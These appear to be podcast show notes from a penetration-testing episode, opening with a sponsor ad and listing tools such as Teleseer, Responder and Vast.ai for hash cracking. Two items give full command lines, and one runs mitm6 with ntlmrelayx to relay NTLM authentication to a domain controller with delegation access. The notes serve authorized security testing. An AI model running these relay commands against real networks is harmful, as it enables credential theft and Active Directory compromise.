SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Today's tale of pentest pwnage covers some of the following attacks/tools:
- Teleseer for packet capture visualizations on steroids!
- Copernic Desktop Search
- Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it
- I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack
- Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)